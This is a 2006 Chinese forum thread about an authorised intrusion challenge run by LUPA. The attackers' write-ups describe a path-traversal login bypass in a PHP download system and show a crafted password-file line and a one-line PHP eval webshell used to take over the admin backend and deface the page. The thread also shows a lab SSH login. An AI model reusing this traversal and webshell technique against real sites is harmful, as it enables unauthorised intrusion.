sanool

http://hack.lupaworld.com/

--------------------------------
julang3    time:2006-9-10 00:30    come here

id : mhxueshan    time:2006-9-10 00:30    come on! boys and girls!!



文件的最后修改时间是
-rw-r--r--  1 www-data www-data 4158 2006-09-10 00:34 index.html


希望入侵成功的朋友能写下攻击过程 供大家参考

欢迎大家继续尝试

下一阶段LUPA将推出新的入侵实验。

感谢支持

血色眼泪

09/4   11:04

增加PHP程序：软件下载系统 开放FTP

...

才知道...

julang3

原来下一关的题目还没放出来三?我昨天晚上到处找也没找到.

sanool

引用:

下面是引用julang3于2006-09-10 16:36发表的原来下一关的题目还没放出来三?:
原来下一关的题目还没放出来三?我昨天晚上到处找也没找到.

呵呵　　给您发邮件了

希望可以商讨下一关的建设方案

julang3

我和mhxueshan昨天才知道这个攻防实验室的.昨天下午查看网页源代码发现ssh的用户名lab,密码lab,用SSH连上来.试图从操作系统的角度去入侵,随便也对系统的配置作了一些了解,忙了一个下午都没找出到突破口.

      我们晚上从外面回来,大约10点钟吧,觉得从操作系统的角度入侵的可能性不大.便将注意力集中在

了那个下载系统上.从FTP上下载代码,同时在自己的机器上建了一个模拟环境,我们对整个下载系统的代码进行分析.很快发现login.php文件中的问题$data=explode("|",readfrom("../data/user/

$login_name.php"));这里的$login_name是从登录框传过来的,没作任何处理便直接放进了代码中.那么就可以通过提交../../username形式的用户名来转向任意密码文件.分析了一下整个验证部分的代码.便有了一个方案.用ssh登上去.在/home/lab/下建立一个文件名为julang3.php 里面按密码文件的格式写入的|../../../../../../home/lab/julang3|md5加密后的密码|1| . 然后在登录框内的用户名为../../../../../../home/lab/julang3,密码中输入和我随便设置的一个密码.但要这个密码的MD5值要和/home/lab/julang3.php里的md5值一致.这样就进入了管理后台.

     下面就是尝试得到WEBSHELL,这样就可以改那个文件了.很快我同学mhxueshan发现可以通过增加一个名为"<?php eval($_POST[cmd])?>"的大类,这样一句话的PHP木马就插入成功了,然后用PHP一句话木马的客户端连 data/class.php文件就拿到WEBSHELL了.现在改那个首页文件就非常容易了.
   将我们的ID放上去后本来想给自己留一后门的.后来一想这样对出题方不得.因为谁都能登上了.而且

很容易发现我们留的后门.为了不破坏这个测试,给后来的朋友锻炼机会,我们把后门和加在下载系统超级

用户都删除了.

      欢迎大家多多指教

sanool

恩　不错

使用到的基础条件包括
１　ＳＳＨ帐号
２　有漏洞的下载系统


下一阶段　我想还是以web的技术漏洞　　还个其他的比较著名的项目
LUPA愿意提供服务器进行各种测试

ＰＳ：这个下载系统是　　小飞熊下载系统

mhxueshan

我是通过黑客防线里面的广告看到了进来的,我和julang3以参加过一些windows下的攻防比赛,现在正想研究一下Linux下的攻防,所以对这个实验室很有兴趣.
   我昨天上午首先是拿出扫描器扫了一下,唯一的新发现就是ftp的一个用户ftp是空密码,连上去发现什么都没有,权限还很小.用ssh连上了,改了/home/lab下的index.html发现没效果,就马上去找apche的默认目录,找到了发现改不了.其实我对Linux也不熟,julang3比我要熟很多,我只会一些基本操作,所以可能就是这个原因,我就去找Debian的一些已经公布的漏洞信息,结果没什么收获.
   到了晚上10点多,Julang3问我下了 "下载站" 的源码没有,上午我已经下下来了,不过没看.当时我心里一亮,怎么我这么傻呢??以前windows下攻防第一步经常都是通过web入手的啊,怎么一碰到Linux我却思路都变了呢??
   接下来赶紧自已架站分析那个下载站,找到版权去网上搜没搜到,那就只有自己找了.后面就同julang所说的
<?echo"终止，您进行的操作非法！";exit;?>|../../../../../../home/lab/mhxueshan|211f13288556d74f64e7cea2617aff08|1|1157812684|
这是放在/home/lab/下的mhxueshan.php  ,
    接下来就挂马修改文件,当时我是删了重新上传的,当时我也没想到www-data可以写lupa的文件,只是试一下就删了,改完后清除一些文件后就完了
  我相信有很多人可能和我开始一样的,只想着怎么找操作系统的漏洞,一些服务器的漏洞,没想到从web入手
  希望以后宣传广一点,让更多有兴趣的朋友参与进来

geminis

不错，赞赞！！！

bigapple

貌似最初的时候没这个下载系统的吧

henry.ning

ssh hack.lupaworld.com -l lab
Password:
Linux lab 2.6.8-3-686 #1 Sat Jul 15 10:32:25 UTC 2006 i686 GNU/Linux

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

Last login: Tue Sep 12 14:00:01 2006 from 218.18.140.190
lab@lab:~$